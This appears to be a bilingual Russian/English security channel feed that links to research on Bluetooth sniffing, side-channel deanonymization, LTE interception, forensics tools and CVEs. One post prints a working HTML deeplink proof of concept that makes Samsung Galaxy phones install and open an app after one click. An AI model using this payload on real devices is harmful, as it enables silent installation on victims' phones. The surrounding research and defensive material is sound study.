🌐 Sniffle is a sniffer for Bluetooth 5 and 4.x (LE) using TI CC1352/CC26x2 hardware.Sniffle has a number of useful features, including:💾Support for BT5/4.2 extended length advertisement and data packets💾Support for BT5 Channel Selection Algorithms #1 and #2💾Support for all BT5 PHY modes (regular 1M, 2M, and coded modes)💾Support for sniffing only advertisements and ignoring connections💾Support for channel map, connection parameter, and PHY change operations💾Support for advertisement filtering by MAC address and RSSI💾Support for BT5 extended advertising (non-periodic)💾Support for capturing advertisements from a target MAC on all three primary advertising channels using a single sniffer. This makes connection detection nearly 3x more reliable than most other sniffers that only sniff one advertising channel.💾Easy to extend host-side software written in Python💾PCAP export compatible with the Ubertooth💾Wireshark compatible plugin Images Images Images Images
2023-06-30 16:18:13
📟Side-Channel VoIP Profiling Attack against Customer Service Automated Phone System#deanonymization #SCA #VoIP #SIP #VAD #silence_suppression
2023-06-30 16:18:01
#deanonymization #SCA #VoIP #SIP #VAD #silence_suppression Images Images Images
2023-06-30 14:14:27
#humor #security #Matrix Images
2023-06-30 14:05:12
🛡Safeguarding our future.#NCSC #PRC #US #counterespionage #vulnerabilities Images Images
2023-06-30 12:41:23
🧅Modeling Tor Network Growth by Extrapolating Consensus Data#security #privacy #anonymity #Tor #infrastructure #scaled_networks
2023-06-30 12:41:14
#security #privacy #anonymity #Tor #infrastructure #scaled_networks Images Images Images
2023-06-30 11:13:04
Всем здравствуйте, не желайте пирожок, или может выпить из бутылька?🥐Я все еще пишу статью про air gap. Но чтобы не оставлять вас без интересного контента я сделала небольшой сборник инструментов по анти-форензике и не только.Русская версияHello everyone, would you like a pie, or maybe a drink from the bottle? 🥐I'm still writing the air gap article. But not to leave you without interesting content I made a little compilation of tools on anti-forensics and not only.English version
2023-06-30 10:04:07
|AppSec Ezine|📰489rd EditionRelease Date: 30/06/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-06-28 18:34:58
🛡Defending Continuous Integration/Continuous Delivery (CI/CD) Environments#security #CI_CD #DevSecOps #CSI #NSA #CISA
2023-06-28 18:34:49
#security #CI_CD #DevSecOps #CSI #NSA #CISA Images Images Images Images
2023-06-28 17:03:57
📲Intercepting My Own 2G GSM Phone Call On A Real Cellular Network!So here is a quick video of how a GSM voice call is intercepted using DragonOS linux, a software defined radio and gr-gsm. Images Images Images
2023-06-28 14:19:57
🌐Network Signal GuruPermissions:📲android.hardware.wifi📲android.hardware.telephony📲android.hardware.location📲android.permission.INTERNET📲android.permission.WRITE_EXTERNAL_STORAGE📲android.permission.ACCESS_FINE_LOCATION📲android.permission.ACCESS_COARSE_LOCATION📲android.permission.ACCESS_WIFI_STATE📲android.permission.ACCESS_NETWORK_STATE📲android.permission.FOREGROUND_SERVICE📲android.permission.READ_PHONE_STATE📲android.permission.POST_NOTIFICATIONS📲com.android.vending.BILLING🧬VT(fe75ad6d617d65508ce2088e580a6ae14d9b2b8fa98a16ba80caea44d88969aa)
2023-06-28 13:44:19
📲Detect the target user's iPhone system version through signalingApple:We’re unable to identify a security issue in your report.We reviewed your report and were unable to identify a security issue.📡LTE base station with limesdr 📡Complete Open Source LTE Base Station (eNB) Software 📡Stuff for srsLTE IMSI catcher 📡Open source SDR 4G software suite from Software Radio Systems📡FALCON - Fast Analysis of LTE Control channels📡LTESniffer - An Open-source LTE Downlink/Uplink Eavesdropper Images
2023-06-26 22:25:05
🕵️‍♂️Collecting Channel State Information in Wi-Fi Access Points for IoT Forensics.#DFIR #forensics #physical_layer #IoT #WiFi_AP #CSI #CSI_Sniffer #ISP
2023-06-26 22:24:19
#DFIR #forensics #physical_layer #IoT #WiFi_AP #CSI #CSI_Sniffer #ISP Images Images Images
2023-06-26 18:34:22
🔥BlueTrust, goodbye to Bluetooth privacyBlueTrust is a new Bluetooth attack technique developed by Tarlogic that allows to determine which devices have been previously paired and if they still maintain a trusted relationship. It arises from an evolution of the BIAS and KNOB attacks.BlueTrust leverages the ability to spoof device characteristics and bypass the authentication phase of a connection to study the responses received to different probing messages. In this way, information about devices and their users can be inferred, such as whether a device is paired with the impersonated device. Pairing networks can be traced to determine which user each device belongs to, among other useful data.📰Galician county Tarlogic found a security flaw in Bluetooth technology📰‘Open’ mobile phones blocked via Bluetooth: experts from Tarlogic, a Spanish cybersecurity company, share use cases for their BlueTrust solution📰Cybercriminals can use the bluetooth of your mobile to steal information without you knowing it. Images
2023-06-26 17:12:24
🌐HTTPT: A Probe-Resistant Proxy#anonymity #Anti_Censorship #HTTPT #HTTPS #Replay_Attack_Protection #ProbeResistant_Proxies
2023-06-26 17:11:26
|Webtunnel|🧅Все те, кто хотел пощупать HPTTPT(репа на гитхабе) в связке с луковичной маршрутизацией(конкретно для Tor-мостов), наконец вышло пригодная для использования версия Webtunnel. Webtunnel - это PT(pluggable transport) для мостов Tor, который основывается на HTTPT(прокси-сервер, помогает при обходе цензуры при помощи повсеместного распространения протокола HTTPS, помогая сливаться с "обычным" интернет-трафиком). То есть, для противостояния цензуры происходит имитация HTTPS-трафика. Важно заметить, что на одном IP-адресе, можно поднять сразу и WebTunnel и extor-static-cookie и Snowflake и остальные PTs, то есть ничто не мешает сразу у себя держать и Snowflake и WebTunnel.🧅All those who wanted to feel HPTTPT(github repo) in conjunction with onion routing (specifically for Tor bridges), finally came out a usable version of Webtunnel. Webtunnel is a PT (pluggable transport) for Tor bridges, which is based on HTTPT (a proxy server that helps in circumventing censorship with the ubiquity of the HTTPS protocol, helping to merge with "normal" Internet traffic). That is, to counter censorship, HTTPS traffic is simulated. It is important to note that on the same IP address, you can immediately raise both WebTunnel and extor-static-cookie and Snowflake and the rest of the PTs, that is, nothing prevents you from keeping both Snowflake and WebTunnel at once.#anonymity #Anti_Censorship #Tor #PT #bridge #HTTPT #HTTPS #Replay_Attack_Protection #ProbeResistant_Proxies
2023-06-26 17:09:25
#anonymity #Anti_Censorship #Tor #PT #bridge #HTTPT #HTTPS #Replay_Attack_Protection #ProbeResistant_Proxies Images Images Images Images Images Images Images
2023-06-26 16:30:01
None
2023-06-26 11:46:29
🧅Презентация с моего выступления на Osint Workshop V "Идентификация владельцев луковичных ресурсов".from North Palmyra with love#Osint_report #NorthPalmyra #SIGINT #tor #deanonymization #WF #ML #expoitation #SCA #browser #firefox
2023-06-26 11:45:54
#NorthPalmyra #SIGINT #tor #deanonymization #WF #ML #expoitation #SCA #browser #firefox Images
2023-06-23 13:24:44
🦠 TriangleDB Implant🧬 VT(fd9e97cfb55f9cfb5d3e1388f712edd952d902f23a583826ebe55e9e322f730f)
2023-06-23 13:20:08
|AppSec Ezine|📰488rd EditionRelease Date: 23/06/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-06-22 21:11:30
🧅MEA Regional Dark Web Report (Q1 2023)#statistics #darkweb #crime #MEA #TargetAttacks #hacking #ransomware Images Images Images
2023-06-22 01:22:18
🔥 qualcomm_baseband_scripts is a collection of scripts for reversing Qualcomm baseband / modem firmwareAll offsets/addresses in the scripts have been updated to the Pixel 5 March firmware and need to be changed if using a different version.
2023-06-22 01:22:06
🧅NBC-Softmax : Darkweb Author fingerprinting and migration tracking⛓Github repo(PyTorch implementation)#deanonymization #fingerprinting #Darkweb #contrastive_loss_based_clustering #softmax_loss #sybil #metric_learning #block_contrastive #Tor #I2P
2023-06-22 01:21:56
#deanonymization #fingerprinting #Darkweb #contrastive_loss_based_clustering #softmax_loss #sybil #metric_learning #block_contrastive #Tor #I2P Images Images Images
2023-06-22 00:55:58
🧅URM4DMU: an user represention model for darknet markets users#deanonymization #CNN #invariant_representation #Time_Embedding #Structural_Context_Embed #Episode_Embedding #Darknet_marketplace
2023-06-22 00:55:46
#deanonymization #CNN #invariant_representation #Time_Embedding #Structural_Context_Embed #Episode_Embedding #Darknet_marketplace Images Images Images
2023-06-21 16:28:02
#Osint_eventИдентификация злоумышленников, использующий луковичную маршрутизацию без СОРМов Нет, готовой пилюли по поиску злодеев, обитающих в луковичной зоне не будет, однако предоставляемый подход в выступлении поможет закрывать не мало кейсов в более короткие сроки.Из доклада вы узнаете:💾На что стоит обращать внимание при получение первичной информации о злоумышленнике(в т.ч. что использовать)💾Какие методы идентификации используются в разведывательных службах💾Каким образом можно воспользоваться данными методами и инструментами● Автор: @ShizoPrivacyМероприятие пройдет 24.06.2023 в 13:00 по Москве, по адресу: Холодильный пер., д. 3, корп. 1, стр. 8, этаж 1Для посещения требуется регистрация. Images
2023-06-19 22:15:02
📕ma2tl: macOS Forensic Timeline Generator Using mac_apt Analysis Results
2023-06-19 22:14:11
|ma2tl|🕵️‍♂️С помощью данного инструмента можно взять БД, полученные в ходе работы mac_apt и получить таймлайн(forensics-like), что довольно удобно при расследовании. Советую ознакомиться с презентацией с JSAC2022 "ma2tl: macOS Forensic Timeline Generator Using mac_apt Analysis Results", на которой и был представлен инструмент для понимание причин создания оного, про проблемы с Plaso, каким образом можно создать таймлайн, используя результаты анализа mac_apt и про имплементацию ma2tl и так далее. Причем изучив данную работу, можно еще лучше понять работу mac_apt.mac_apt извлекает данные/метаданные ака артефакты из рабочих машинок на macOS(обрабатывает образы различных форматов), причем инструмент активно развивается и про него писал Дмитрий, также прикладываю ниже вырезки из журнала про написание плагинов для оного.🕵️‍♂️With this tool, you can take the databases obtained during the work of mac_apt and get a timeline (forensics-like), which is quite convenient when investigating. I advise you to read the presentation with JSAC2022 "ma2tl: macOS Forensic Timeline Generator Using mac_apt Analysis Results", where a tool was presented to understand the reasons for creating it, about problems with Plaso, how you can create a timeline using the results of mac_apt analysis and about the implementation of ma2tl. Moreover, after studying this work, you can even better understand the work of mac_apt.mac_apt extracts data/metadata aka artifacts from working machines on macOS (processes images of various formats), and the tool is actively developing, I also attach below clippings from a magazine about writing plugins for it.#JSAC2022 #forensics #DFIR #Logs #Timeline #SQLite #HFS #APFS #mac_apt #ios_apt #GrayKey #macOS #persistence #execution #volume_mount
2023-06-19 22:13:15
#JSAC2022 #forensics #DFIR #Logs #Timeline #SQLite #HFS #APFS #mac_apt #ios_apt #GrayKey #macOS #persistence #execution #volume_mount Images
2023-06-19 21:18:51
📕Video-Based Cryptanalysis: Extracting Cryptographic Keys from Video Footage of a Device’s Power LED.#SCA #timing_attack #frequency_scan #LED #CPU #cryptography #cryptanalysis #video #expoitation
2023-06-19 21:18:50
#SCA #timing_attack #frequency_scan #LED #CPU #cryptography #cryptanalysis #video #expoitation Images Images Images Images
2023-06-19 16:24:40
#Osint_eventOsint Workshop Ⅲ и ⅤВсем добрый день! На этот раз у нас целых два мероприятия, одно в Москве, а другое в Санкт-Петербурге и оба 24.06. Расскажем вам обо всем по порядку: ———————————————————————————————🇷🇺 Osint Workshop V (Москва) Мы учли ошибки предыдущего воркшопа, в этот раз мы выходим на новый уровень! Площадка крайне вместительная, места хватит для всех.Планируемые доклады:— Сбор чувствительной информации для пентеста by xanax security— Идентификация владельцев луковичных ресурсов by Shizo Privacy— Специфика физического пентеста в России: кейсы и особенности by #freehacker 💀Дата и место проведения: Мероприятие пройдет 24.06.2023 в 13:00 по Москве, по адресу: Холодильный пер., д. 3, корп. 1, стр. 8, этаж 1Особенности посещения: На входе стоит табличка с QR-кодом, его необходимо отсканировать и заполнить форму, после чего вы можете спокойно проходить дальше 😉———————————————————————————————🇷🇺 Osint Workshop Ⅲ (Санкт-Петербург)— Поиск активов компании на основе открытых источников: базовый уровень by Исследуя Конкурентов — Личное дело каждого: стилеры, логгеры, доксинг - что это и как от этого защититься. by Обмани меня & Cheshire Cat and White RabbitДата и место проведения: Мероприятие пройдет 24.06.2023 в 15:00 по МСК, по адресу: Санкт-Петербург, ул. Труда, д.8 Точка кипения - ГУАП.Особенности посещения: Чтобы попасть на мероприятие в "Точку кипения" нужно зарегистрироваться (паспорт не просят) на платформе Leader-ID, перейти на страницу мероприятия и нажать кнопку "Подать заявку". Готово. Теперь вы можете прийти на мероприятия. При входе вас попросят показать QR-код, его можно найти на главной панели сайта после входа в аккаунт. Также для участие в воркшопе требуется собственный ноутбук.———————————————————————————————Трансляция мероприятий будет проходить в @Intelligence_guild Images
2023-06-16 11:30:17
🔥 BaseComp: A Comparative Analysis for Integrity Protection in Cellular Baseband SoftwareHow to use:1️⃣Load the baseband firmware to ida with the idb-creation directory.2️⃣Find the integrity protection function in the firmware with the function-identification directory.3️⃣Symbolic execution and automated comparative analysis can be done with the symbolic-execution directory.
2023-06-16 10:42:38
📲Freaky Leaky SMS: Extracting User Locations by Analyzing SMS Timings#SMS #silentSMS #SCA #Timing_Attack #expoitation #Location #cellural_Network
2023-06-16 10:42:24
📲Freaky Leaky SMS: Extracting User Locations by Analyzing SMS TimingsБуквально недавно(позавчера) вышла работа про временную атаку по побочному каналу(Timing SCA), направленную на эксплуатацию SMS, получаю возможность различать получателей сообщений в пределах определенной географической области. По сути фигурируют опять "silent SMS"(можно почитать на канале), хотя в данном случае это лишь часть атаки и акцент больше сделан на получение полезной информации из временных задержек в ходе процедуры SMS и по сути атакующему нужен лишь номер телефона жертвы. Если кому вдруг интересно, данная модель для установления геолокации жертвы имеет неплохую точность и при удачном стечение событий может быть равна 96% или в более неблагоприятных условиях - 86%. Исходники вместе с датасетами в скором времени будут в данном репозитории.⚠️Важно! Для эффективного смягчения данных временных атак необходимо как минимум изменение архитектуры процедуры SMS, что как бы маловероятно. Более подробно в работе.Just recently (the day before yesterday), a work was published about a temporary side channel attack (Timing SCA) aimed at exploiting SMS, I get the opportunity to distinguish between message recipients within a certain geographical area. In fact, "silent SMS" appears again (you can read it on the channel), although in this case it is only part of the attack and the emphasis is more on getting useful information from time delays during the SMS procedure and in fact the attacker only needs the victim's phone number. If anyone is suddenly interested, this model for establishing the victim's geolocation has a good accuracy and, with a successful combination of events, it can be equal to 96% or in more unfavorable conditions - 86%. The sources along with the datasets will soon be in this repository.⚠️Important! To effectively mitigate these temporary attacks, it is necessary at least to change the architecture of the SMS procedure, which is unlikely. More details in the paper.#SMS #silentSMS #SCA #Timing_Attack #expoitation #Location #cellural_Network
2023-06-16 10:41:37
#SMS #silentSMS #SCA #Timing_Attack #expoitation #Location #cellural_Network Images Images Images Images
2023-06-16 08:41:21
|AppSec Ezine|📰487rd EditionRelease Date: 16/06/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-06-16 07:30:28
🛡Understanding Ransomware Threat Actors: LockBit#advistory #RaaS #StopRansomware #tools #expoitation #TTP #LockBit #MITRE_ATT_CK #CISA #FBI #MS_ISAC #ACSC #NCSC_UK #CCCS #ANSSI #BSI #CERT_NZ #NCSX_NZ
2023-06-16 07:30:08
#advistory #RaaS #StopRansomware #tools #expoitation #TTP #LockBit #MITRE_ATT_CK #CISA #FBI #MS_ISAC #ACSC #NCSC_UK #CCCS #ANSSI #BSI #CERT_NZ #NCSX_NZ Images Images Images Images Images Images Images Images Images Images
2023-06-16 06:28:11
🔥CVE-2022-38694 to unlock bootloader - unlock bootloader for tyyh2020 and tyyh2021, ALL unisoc T7510 model can be supported(HiSense F50+, HiSense A7, HiSense D50 etc...) . An attacker with physical access to the device can overwrite a function pointer somewhere in the BootROM data section or a return address stored on the stack and execute their own code with BootROM privileges.🔖There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities
2023-06-15 12:37:36
Давненько я не писал что-то сам, посему ловите старенький, но очень хороший гайд по мобильной форензике от SANS. Делиться остальным по курсу не буду, ибо устаревшее (2020 год как никак). В данном документе вы найдете довольно много информации по форензике и сможете свободно плавать в этой теме после изучения. Рекомендую всем, кто интересуется.В купе с инфой из репы данного поста, вы будете иметь представление о внутренностях Андроида.Изучайте на здоровье ;)З.Ы. Кому понадобится Cellebrite UFED и Analyzer для обучения, можете спокойно найти его в тг.
2023-06-14 17:14:40
📕Harden Baseboard Management Controllers#security #CSI #CISA #NSA #BMC #fw #Hardening #creds #VLAN_separation #configs #RoT
2023-06-14 17:14:34
#security #CSI #CISA #NSA #BMC #fw #Hardening #creds #VLAN_separation #configs #RoT Images Images Images
2023-06-14 15:27:50
📲 Статья от @testanull из @starlabs про open-redirect уязвимость(особенность у устройств Samsung, каким образом определенные приложения обрабатывают "глубинные ссылки" ака deeplinks) в функции DetailAlleyPopupDeeplink.runInternalDeepLink() при использовании следующих параметров в глубиной ссылке: directInstall и directOpen, которая была обнаружена во время Pwn2Own 2022 и в дальнейшем проэксплуатирована на Samsung Galaxy S22(1-click, то есть пользователь должен был кликнуть на ссылку злоумышленника и происходил запуск/установка любого приложения без дальнейшего взаимодействия с пользователем). Про исправленную XSS-уязвимость, анализ которой помог при поиске оной, можно почитать тут: "SSD Advisory – Galaxy Store Applications Installation/Launching without User Interaction".📺Демо тут.📲 An article from @testanull from @starlabs about an open-redirect vulnerability (a feature of Samsung devices, how certain applications handle and process deeplinks) in DetailAlleyPopupDeeplink.runInternalDeepLink() function when using the following parameters in the deep link: directInstall and directOpen , which was discovered during Pwn2Own 2022 and subsequently exploited on Samsung Galaxy S22(1-click, that is, the user had to click on the attacker's link and any application was launched/installed without further interaction with the user).About the fixed XSS vulnerability, the analysis of which helped in finding it, you can read here: "SSD Advisory – Galaxy Store Applications Installation/Launching without User Interaction".📺Demo here.PoC:<head> </head> <body> <b><a id="exploit" href="samsungapps://MCSLaunch?action=each_event&url=https://us.mcsvc.samsung.com/mcp25/devops/redirect.html?mcs=kr%26product=samsungpay%26actionType=eventURL%26fallbackUrl=https://apps.samsung.com/appquery/appDetail.as%253fappId%253dcom.sec.android.app.popupcalculator%2526directInstall%253dtrue%2526directOpen%253dtrue%2526form%253dpopup">click_me</a></b> </body> <script> </script>⛓Данная глубинная ссылка управляется действием, называемым McsWebViewActivity.Каждая глубинная ссылка, которая связана с McsWebViewActivity обрабатывается классом McsWebViewClient.⛓This deep link is controlled by an action called McsWebViewActivity.Each deep link that is associated with the McsWebViewActivity is handled by the McsWebViewClient class.#mobile #Android #Samsung #vulnerability #expoitation #open_redirect #deep_link #1click
2023-06-14 15:26:25
📲(Pwn2Own) Samsung Galaxy S22 McsWebViewActivity Permissive List of Allowed Inputs RCE Vuln(CVE-2023-21515) The specific flaw exists within the McsWebViewActivity class. The issue results from a permissive list of allowed inputs. An attacker can leverage this… Images Images Images Images
2023-06-14 12:03:12
None Images Images Images Images Images Images Images Images
2023-06-14 10:44:24
📡Drone Security and Fault Injection Attacks"IOActive has been researching the possibility of using non-invasive techniques, such as electromagnetic (EM) side-channel attacks or EM fault injection (EMFI), to achieve code execution on a commercially available drone with significant security features. For this work, we chose one of the most popular drone models, DJI’s Mavic Pro. DJI is a seasoned manufacturer that emphasizes security in their products with features such as signed and encrypted firmware, Trusted Execution Environment (TEE), and Secure Boot."#DJI_Mavic_Pro #Drone #UAV #RF #SCA #Timing_Attack #Power_Analysis #EMFI #fw #cryptography #security #expoitation #memory_corruption #code_execution
2023-06-14 10:44:17
#DJI_Mavic_Pro #Drone #UAV #RF #SCA #Timing_Attack #Power_Analysis #EMFI #fw #cryptography #security #expoitation #memory_corruption #code_execution Images Images Images Images Images Images Images Images Images
2023-06-12 12:17:59
None
2023-06-12 12:17:58
None Images Images Images Images Images Images
2023-06-10 23:22:42
📡Unchained Skies: A Deep Dive into Reverse Engineering and Exploitation of Drones Довольно интересный доклад по реверсу и фаззингу(hardware-in-the-loop fuzzing) дронов, сфокусированному на DJI от Nico Schiller(@74ck_0) и Moritz Schloegel(@m_u00d8) на REcon 2023. В докладе есть упоминание свежих уязвимостей, которые могут использоваться для: байпасса подписей поставщика в лице DJI(обновления встроенного ПО) для загрузки пользовательского кода, получение root-прав и выведение из строя в полете дрона через смартфон оператора. Собственно, выступающие уже затрагивали данную тему в работе "Drone Security and the Mysterious Case of DJI’s DroneID"(репозиторий на гитхабе) про поверхность атаки DJI-дронов, разбор обсуждаемого неоднократно (НЕ)безопасного дизайна протокола DJI DroneID(отключение, перехват и подделывание оного).#DJI #drone #DroneID #UAV #security #RE #SAST #DAST #fw #fuzzing #vulnerabilities #DoS #arbitrary_code_execution #expoitation #bypass
2023-06-10 23:22:30
📡Unchained Skies: A Deep Dive into Reverse Engineering and Exploitation of Drones Quite an interesting report on the reverse engineering and fuzzing (hardware-in-the-loop fuzzing) of drones, focused on DJI by Nico Schiller(@74ck_0) and Moritz Schloegel(@m_u00d8) at REcon 2023. The report mentions fresh vulnerabilities that can be used for: bypass of vendor signatures in the person of DJI (firmware updates) to upload user code, obtaining root rights and disabling a drone in flight via the operator's smartphone.Actually, the speakers have already touched on this topic in the work "Drone Security and the Mysterious Case of DJI's DroneID"(github repo) about the attack surface of DJI drones, an analysis of the repeatedly discussed (NOT) secure design of the DJI DroneID protocol (disabling, intercepting and faking it).#DJI #drone #DroneID #UAV #security #RE #SAST #DAST #fw #fuzzing #vulnerabilities #DoS #arbitrary_code_execution #expoitation #bypass Images Images Images Images Images Images Images Images Images Images
2023-06-09 16:07:36
📲(Pwn2Own) Samsung Galaxy S22 McsWebViewActivity Permissive List of Allowed Inputs RCE Vuln(CVE-2023-21515)The specific flaw exists within the McsWebViewActivity class. The issue results from a permissive list of allowed inputs. An attacker can leverage this vulnerability to execute code in the context of the current user.📲(Pwn2Own) Samsung Galaxy S22 InstantPlaysDeepLink Permissive List of Allowed Inputs RCE Vuln(CVE-2023-21514)The specific flaw exists within the InstantPlaysDeepLink class. The issue results from a permissive list of allowed inputs. An attacker can leverage this vulnerability to execute code in the context of the current user.📲(Pwn2Own) Samsung Galaxy S22 McsWebViewActivity Permissive List of Allowed Inputs RCE Vuln(CVE-2023-21516)The specific flaw exists within the McsWebViewActivity class. The issue results from a permissive list of allowed inputs. An attacker can leverage this vulnerability to execute code in the context of the current user.📲(Pwn2Own) Samsung Galaxy S22 McsWebViewActivity Permissive List of Allowed Inputs RCE vuln(ZDI-23-843).The specific flaw exists within the McsWebViewActivity class. The issue results from a permissive list of allowed inputs. An attacker can leverage this vulnerability to execute code in the context of the current user
2023-06-09 15:09:18
|AppSec Ezine|📰486rd EditionRelease Date: 09/06/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-06-09 00:12:50
|Sysdiagnose analysis framework|🕵️‍♂️Довольно простой в использовании инструментарий для анализа диагностических логов iOS(sysdiagnose) для проверки целостности.Почитать про sysdiagnose в iOS 16 можно тут.Перед запуском парсера, необходимо добавить новый кейс для sysdiagnose:$ python initialyze.py file имя_файлаЗапускаются парсеры довольно просто:$ python parsing.py parse sysdiagnose-ps 1$ python sysdiagnose-uuid2path 1$ python sysdiagnose-mobileactivation 1$ python sysdiagnose-accessibility-tcc 1Результат будет сохранен тут:./parsed_data/1/sysdiagnose-xxxxx.jsonи так далееЗ.Ы. Для того, чтобы узнать список парсеров следует ввести команду:$ python parsing.py list parsers⚠️В том случае, если появится желание визуализировать таймлайны, которые мы извлекли через sysdiagnose и в то же время позволяют вычислительные ресурсы, то данное дело можно организовать в Timesketch.⚠️Важная особенность: данный инструментарий можно использовать, как вспомогательный, при анализе iOS-устройства, которое потенциально было заражено spyware.🕵️‍♂️A fairly easy-to-use toolkit for analyzing iOS diagnostic logs (sysdiagnose) to check the integrity.You can read about sysdiagnose in iOS 16 here.Before launching the parser, you need to add a new case for sysdiagnose:$ python initialyze.py file file_nameParsers are launched quite simply:$ python parsing.py parse sysdiagnose-ps 1$ python sysdiagnose-uuid2path 1$ python sysdiagnose-mobileactivation 1$ python sysdiagnose-accessibility-tcc 1The result will be saved here:./parsed_data/1/sysdiagnose-xxxxx.jsonand so onP.S. In order to find out the list of parsers, enter the command:$ python parsing.py list parsers⚠️In the event that there is a desire to visualize the timelines that we extracted through sysdiagnose and at the same time allow computing resources, then this case can be organized in Timesketch.⚠️Important feature: this toolkit can be used as an auxiliary tool when analyzing an iOS device that has potentially been infected with spyware.#forensics #DFIR #iOS #sysdiagnose #timeline #spywareAnalysis #JB_not_need
2023-06-09 00:12:34
#forensics #DFIR #iOS #sysdiagnose #timeline #spywareAnalysis Images
2023-06-08 17:59:56
💥По сути был зафикшен выбор хэндлера хранилища для "arguments objects" во время "inline caching"(исходники которого находятся в следующей директории V8: /src/ic ).💥 In fact, the store handler selection for "arguments objects" was fixed during "inline caching" (the sources of which are located in the following V8 directory: /src/ic).🔖Для более лучшего понимания "inline caching" в V8 и последующей эксплуатации советую прочитать следующие материалы/ For a better understanding of "inline caching" in V8 and subsequent exploitation, I advise you to read the following materials:🌐Javascript Hidden Classes and Inline Caching in V8🌐JavaScript engine fundamentals: Shapes and Inline Caches🌐V8 optimizations behind the scenes🌐Inside JavaScript Engines, Part 2: code generation and basic optimizations🌐CVE-2021-38001: A Brief Introduction to V8 Inline Cache and Exploitating Type Confusion🌐analysis of CVE-2021-38001 by @vngkv123🌐The Chromium super (inline cache) type confusion#security #expoitation #JSE #V8 #TypeConfusion #inlineCaching
2023-06-08 14:33:54
🧅Security Onion cheat sheet is updated for version 2.4 Beta 3. #security #SecurityOnion #CheatSheet #ThreatHunting #network #monitoring Images Images
2023-06-08 11:53:50
🔓Exploring Formal Methods for Cryptographic Hash Function Implementations.💥SHA-3 Buffer Overflow (Part 2, part 1 here).In this writeup Nicky Mouha give a brief intro to three indispensable tools: KLEE Web, CodeQL for GitHub, and deps.dev, that helping to find vulnerability(CVE-2022-37454, the Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant BoF that allows attackers to execute arbitrary code or eliminate expected cryptographic properties).💥 KLEE is a symbolic virtual machine built on top of the LLVM compiler infrastructure. Currently, there are two primary components:1️⃣The core symbolic virtual machine engine; this is responsible for executing LLVM bitcode modules with support for symbolic values.2️⃣A POSIX/Linux emulation layer oriented towards supporting uClibc, with additional support for making parts of the operating system environment symbolic.#vulnerability #cryptography #expoitation #HashFunctions #SHA3 #BLAKE #XKCP #Grøstl #Apple_CoreCrypto
2023-06-08 11:53:30
#vulnerability #cryptography #expoitation #HashFunctions #SHA3 #BLAKE #XKCP #Grøstl #Apple_CoreCrypto Images Images Images Images
2023-06-07 16:45:55
💥Теперь данный баг: "Side-channel attack can deanonymize users (potential risk to journalists and activists)" стал публичным и на bugzilla.mozilla.org(bug id: 1749129)💥Now this bug: "Side-channel attack can deanonymize users (potential risk to journalists and activists)" has become public and on bugzilla.mozilla.org (bug id: 1749129)#deanonymization #SCA #cacheSCA #COOP #CORP #affects_Browsers #firefox #Tor #Chromium_based #Safari Images Images Images
2023-06-07 00:57:01
🔥CVE-2023-3079(bug id: 1450481) - Type Confusion in V8( 0-day, may have been actively exploited/ITW )Reviewed here: 4584248 "[ic] Fix store handler selection for arguments objects" Images Images
2023-06-06 22:51:22
📕Guide to securing remote access software. #CISA #NSA #FBI #MS_ISAC #INCD #security #RAS #expoitation #TTPs #recognize #detection #recommendations #network
2023-06-06 22:51:16
#CISA #NSA #FBI #MS_ISAC #INCD #security #RAS #expoitation #TTPs #recognize #detection #recommendations #network Images Images Images Images Images Images
2023-06-05 10:53:41
#Osint_mediaExecutive Summary:— Народно-освободительная армия (НОАК) применяет новые технологии сбора, обработки и анализа данных, чтобы использовать огромный объем информации из открытых источников, доступной в Интернете в целях военной разведки. — Растущая экосистема частных компаний, государственных предприятий, государственных исследовательских организаций и университетов поддерживает обеспечивает НОАК в ее стремлении использовать OSINT, предоставляя исследовательские услуги, платформы и данные. — ВПК Китая используют автоматизированные веб-краулеры, алгоритмы, машинное обучение, искусственный интеллект и другие инструменты для получения разведывательной информации от иностранных правительств, военных, социальных сетей, компаний, исследовательских организаций и частных лиц. НОАК, скорее всего, использует OSINT наряду с другими формами разведки для информационного обеспечения принятия решений на стратегическом, оперативном и тактическом уровнях. — Использование НОАК OSINT, скорее всего, дает ей преимущество в разведке, поскольку открытая информационная среда Запада позволяет НОАК легко собирать большие количество данных из открытых источников, в то время как западные военные должны бороться с закрытой китайской информационной средой Китая. Данный отчет предлагает обзор китайских взглядов на военный OSINT, подробно описывает как НОАК применяет OSINT, а также описывает несколько частных компаний, которые предоставляют разведывательные сведения военному истэблишменту Китая на коммерческой основе. Images
2023-06-05 10:50:31
📲Android OS Privacy Under the Loupe - A Tale from the East"China is currently the country with the largest number of Android smartphone users. We use a combination of static and dynamic code analysis techniques to study the data transmitted by the preinstalled system apps on Android smartphones from three of the most popular vendors in China. Through traffic analysis, we find these packages transmit to many third-party domains privacy sensitive information related to the user's device (persistent identifiers), geolocation , user profile (phone number, app usage) and social relationships, without consent or even notification. This poses serious deanonymization and tracking risks that extend outside China when the user leaves the country, and calls for a more rigorous enforcement of the recently adopted data privacy legislation. "#deanonymization #security #privacy #Android #fw #RE #trafficAnalysis #China #SAST #DAST #dangerousPrivileges
2023-06-05 10:49:27
None Images Images Images
2023-06-05 10:39:47
🌐No safety in numbers: traffic analysis of sealed-sender groups in Signal.#security #deanonymization #cryptography #E2E #Signal #SDA
2023-06-05 10:39:41
None Images Images
2023-06-05 10:31:47
🧅Europe Regional Dark Web Report (Q1 2023)#statistics #darkweb #crime #Europe #TargetAttacks #hacking #ransomware Images Images Images Images
2023-06-03 15:26:06
💙Закончил майндмап по расследованию эфириум кошелька
2023-06-02 14:14:11
💥CVE-2017-6195(SQL-Injection in MOVEit Transfer aka MOVEit DMZ)A (blind) SQL-Injection vulnerability has been identified in the moveitisapi.dll of the MOVEit Transfer product of ipswitch. The overall impact this vulnerability dependson the type and configuration settings of the database. The MOVEit Transfer product ships with a MySQL database. But it can also be configured to use aMSSQL DB. By default it is configured to use the MySQL DB. The default user rights of the DB user ‘moveitdmz’ are also very limited, e.g. it is not possible to perform any actions on the filesystem like ‘select into outfile’. By default the exploitation of the vulnerability is further limited because no query stacking is possible and the injection location resides within a select query. So no modifications of DB tables are possible, thus no combinations of the DB commands like select and insert are possible.🔥PoC here
2023-06-02 13:55:02
